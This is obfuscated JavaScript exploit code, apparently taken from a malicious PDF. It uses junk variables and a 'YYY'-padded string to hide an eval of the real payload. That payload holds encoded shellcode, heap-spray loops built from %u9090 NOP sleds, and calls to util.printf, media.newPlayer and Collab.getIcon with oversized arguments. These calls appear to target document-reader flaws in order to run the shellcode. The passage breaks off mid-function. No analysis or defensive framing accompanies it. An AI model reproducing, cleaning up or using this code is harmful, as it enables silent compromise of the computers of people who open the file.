ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C9E5&&CACA&&C4C7&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");<br /><br />var yiypg414830 = "_cc574b95084";var cwyuonoyo302180 = "_4b79760e42c";/* muuavvusau495652 = 46; <uauogigqoh191543> */var uuyaeiqe228524 = "_71a45be3b60";var ev = 'yeegsgvsssaglh';var oepeyeeupo553973 = "_46637835fbf";var iheao826985 = "_2b7a51658e4";var ahaaueui531169 = "_54df0b74788";var ueuieozhyl59534 = "_e6935076301";/* uorjo80661 = 37; <ehisoe602997> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';var yuuei247913 = "_0456ff91871";/* yukfbzyi678025 = 64; <uzieq740219> */var yoiaoia3559 = "_9ae0a50e46f";/* jhwatwt700250 = 30; <xuyuuixa526322> */var uyuziauiwa806528 = "_754b4ff18a5";/* oyiyaaiee996158 = 18; <ofturo539858> */cwyuvaooeo = 'YYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYY\"YYY%YYYuYYY1YYY1YYYEYYYBYYY%YYYuYYY4YYYBYYY5YYYBYYY%YYYuYYYCYYY9YYY3YYY3YYY%YYYuYYY8YYY1YYY6YYY6YYY%YYYuYYYAYYYFYYYCYYY9YYY%YYYuYYY8YYY0YYY0YYY1YYY%YYYuYYY0YYYBYYY3YYY4YYY%YYYuYYYEYYY2YYYAYYY6YYY%YYYuYYYEYYYBYYYFYYYAYYY%YYYuYYYEYYY8YYY0YYY5YYY%YYYuYYYFYYYFYYYEYYYAYYY%YYYuYYYFYYYFYYYFYYYFYYY%YYYuYYY7YYYCYYY4YYYFYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYFYYY9YYYAYYY6YYY%YYYuYYY0YYY7YYYCYYY2YYY%YYYuYYYAYYY6YYY9YYY6YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYEYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYYAYYYAYYY%YYYuYYYBYYYAYYYDYYY6YYY%YYYuYYY2YYYDYYY0YYYBYYY%YYYuYYYAYYYEYYYCYYYEYYY%YYYuYYYDYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYY8YYY6YYY%YYYuYYY2YYY6YYYAYYY6YYY%YYYuYYYCYYYDYYY9YYY8YYY%YYYuYYY5YYY5YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY3YYY%YYYuYYYEYYY0YYY4YYYAYYY%YYYuYYY2YYY6YYYEYYY0YYY%YYYuYYYDYYY4YYY9YYY8YYY%YYYuYYY5YYY1YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY8YYY%YYYuYYY2YYYDYYY5YYY6YYY%YYYuYYYCYYYCYYY5YYY1YYY%YYYuYYYFYYYFYYYAYYY5YYY%YYYuYYYFYYYDYYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY4YYY4YYYAYYY6YYY%YYYuYYYCYYYEYYY5YYYFYYY%YYYuYYYCYYY8YYYCYYY9YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYDYYY3YYYCYYYEYYY%YYYuYYYCYYYAYYYDYYY4YYY%YYYuYYYFYYY2YYYCYYYBYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYYEYYY3YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYCYYYEYYYAYYY6YYY%YYYuYYY9YYY5YYYCYYYAYYY%YYYuYYYAYYY6YYY9YYY4YYY%YYYuYYYDYYY5YYYCYYYEYYY%YYYuYYYCYYY3YYYCYYYEYYY%YYYuYYYFYYY2YYYCYYYAYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYY9YYY7YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY2YYY5YYYAYYY6YYY%YYYuYYYEYYY6YYY4YYYAYYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYCYYYCYYYFYYY5YYY%YYYuYYY5YYY9YYYEYYY6YYY%YYYuYYYAYYY2YYYFYYY0YYY%YYYuYYYAYYY2YYY6YYY1YYY%YYYuYYYCYYY7YYYAYYY5YYY%YYYuYYYCYYY3YYY8YYY8YYY%YYYuYYYCYYY0YYYDYYYEYYY%YYYuYYYEYYY2YYY6YYY1YYY%YYYuYYYAYYY2YYYAYYY5YYY%YYYuYYYAYYY6YYYCYYY3YYY%YYYuYYY6YYY6YYY9YYY5YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY1YYYFYYY5YYY%YYYuYYY5YYY9YYYFYYY6YYY%YYYuYYYAYYYAYYYFYYY0YYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY5YYYFYYY6YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY0YYY5YYY9YYY%YYYuYYY5YYY9YYYBYYY6YYY%YYYuYYYAYYYEYYYFYYY0YYY%YYYuYYYFYYY0YYYFYYY7YYY%YYYuYYYDYYY3YYY2YYYDYYY%YYYuYYY2YYYDYYY9YYYAYYY%YYYuYYY8YYY8YYYDYYY2YYY%YYYuYYYAYYY5YYYDYYYEYYY%YYYuYYYFYYY0YYY5YYY3YYY%YYYuYYYDYYY0YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY6YYY%YYYuYYY9YYY5YYY5YYY3YYY%YYYuYYYEYYYFYYY6YYYFYYY%YYYuYYY0YYYBYYYEYYY7YYY%YYYuYYY6YYY3YYYAYYY5YYY%YYYuYYY7YYYDYYY9YYY5YYY%YYYuYYY1YYY8YYYAYYY9YYY%YYYuYYY9YYYCYYYBYYY6YYY%YYYuYYYDYYY2YYY7YYY0YYY%YYYuYYY6YYY7YYYAYYYEYYY%YYYuYYYAYYYBYYY6YYYDYYY%YYYuYYY7YYYCYYYAYYY5YYY%YYYuYYY4YYYDYYYEYYY6YYY%YYYuYYY9YYYDYYY5YYY7YYY%YYYuYYYDYYY3YYYBYYY9YYY%YYYuYYYFYYY8YYY4YYY1YYY%YYYuYYYFYYY8YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY2YYY%YYYuYYYCYYY0YYY7YYYBYYY%YYYuYYYAYYYAYYY2YYYDYYY%YYYuYYY2YYYDYYYEYYYDYYY%YYYuYYYBYYYAYYYFYYY8YYY%YYYuYYY7YYYBYYYAYYY5YYY%YYYuYYYAYYY2YYY2YYYDYYY%YYYuYYYAYYY5YYY2YYYDYYY%YYYuYYY0YYYDYYY6YYY3YYY%YYYuYYYFYYYFYYYFYYY8YYY%YYYuYYY4YYYEYYY6YYY5YYY%YYYuYYY5YYY9YYY8YYY7YYY%YYYuYYY5YYY9YYY5YYY9YYY%YYYuYYYEYYY8YYY2YYY8YYY%YYYuYYY4YYYAYYYAYYY8YYY%YYYuYYY6YYYCYYY9YYY5YYY%YYYuYYYFYYYDYYY2YYYCYYY%YYYuYYY7YYYEYYYDYYY8YYY%YYYuYYYDYYY5YYY4YYY4YYY%YYYuYYYBYYYCYYY9YYY0YYY%YYYuYYYDYYY6YYY8YYY9YYY%YYYuYYY1YYYDYYYFYYY8YYY%YYYuYYYBYYYDYYY4YYY7YYY\"YYY+YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY+YYY\"YYY%YYYuYYY0YYY0YYYAYYY6YYY\"YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYvYYYaYYYrYYY YYYeYYYoYYYbYYYwYYYeYYY=YYY\"YYYpYYY@YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY YYY:YYY YYYyYYYyYYYyYYYyYYY1YYY1YYY1YYY\"YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYdYYY(YYYeYYYoYYYbYYYwYYYeYYY,YYY YYYnYYYeYYYwYYY YYYDYYYaYYYtYYYeYYY(YYY)YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYgYYYrYYYiYYYzYYYxYYYwYYY=YYY1YYY2YYY0YYY0YYY0YYY;YYY\rYYY\nYYYjYYYuYYYcYYYoYYYbYYYuYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYkYYYlYYYkYYYnYYYgYYY YYY=YYY YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYnYYYeYYYwYYYpYYYlYYYaYYYyYYYeYYYrYYY)YYY;YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY)YYY;YYY\rYYY\nYYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY YYY<YYY=YYY YYY0YYYxYYY8YYY0YYY0YYY0YYY)YYY{YYYkYYYlYYYkYYYnYYYgYYY+YYY=YYYkYYYlYYYkYYYnYYYgYYY;YYY}YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYkYYYlYYYkYYYnYYYgYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYY(YYY0YYY,YYY0YYYxYYY8YYY0YYY0YYY0YYY YYY-YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYfYYYzYYYfYYYwYYYaYYYmYYY=YYY0YYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY<YYYgYYYrYYYiYYYzYYYxYYYwYYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY+YYY+YYY)YYY YYY{YYYjYYYuYYYcYYYoYYYbYYYuYYY[YYYfYYYzYYYfYYYwYYYaYYYmYYY]YYY=YYYkYYYlYYYkYYYnYYYgYYY YYY+YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY;YYY}YYY\rYYY\nYYYiYYYfYYY(YYYgYYYrYYYiYYYzYYYxYYYwYYY)YYY{YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYtYYYrYYYyYYY YYY{YYYtYYYhYYYiYYYsYYY.YYYmYYYeYYYdYYYiYYYaYYY.YYYnYYYeYYYwYYYPYYYlYYYaYYYyYYYeYYYrYYY(YYYnYYYuYYYlYYYlYYY)YYY;YYY}YYY YYYcYYYaYYYtYYYcYYYhYYY(YYYeYYY)YYY YYY{YYY}YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYY}YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYpYYYrYYYiYYYnYYYtYYYfYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYoYYYpYYY YYY=YYY\"YYY\"YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYYCYYYnYYYtYYY=YYY1YYY2YYY8YYY;YYYiYYYCYYYnYYYtYYY>YYY=YYY0YYY;YYY-YYY-YYYiYYYCYYYnYYYtYYY)YYY YYYnYYYoYYYpYYY YYY+YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYY YYY+YYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY;YYY\rYYY\nYYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY2YYY0YYY;YYY\rYYY\nYYYsYYYpYYYrYYYaYYYyYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYsYYYpYYYrYYYaYYYyYYY)YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYsYYYpYYYrYYYaYYYyYYY YYY<YYY YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY4YYY0YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYuYYYmYYY YYY=YYY YYY1YYY2YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY\"YYY%YYY4YYY5YYY0YYY0YYY0YYYfYYY\"YYY,YYYnYYYuYYYmYYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY YYY+YYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY\rYYY\nYYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY1YYY0YYY;YYY\rYYY\nYYYaYYYcYYYlYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYaYYYcYYYlYYY)YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYaYYYcYYYlYYY<YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYYoYYYrYYYyYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY8YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYYoYYYrYYYyYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY4YYY0YYY1YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYY YYY=YYY YYYAYYYrYYYrYYYaYYYyYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYY YYYiYYY<YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYbYYYuYYYfYYYfYYYeYYYrYYY[YYYiYYY]YYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYgYYYeYYYtYYYIYYYcYYYoYYYnYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYY+YYY\"YYY_YYYNYYY.YYYbYYYuYYYnYYYdYYYlYYYeYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY 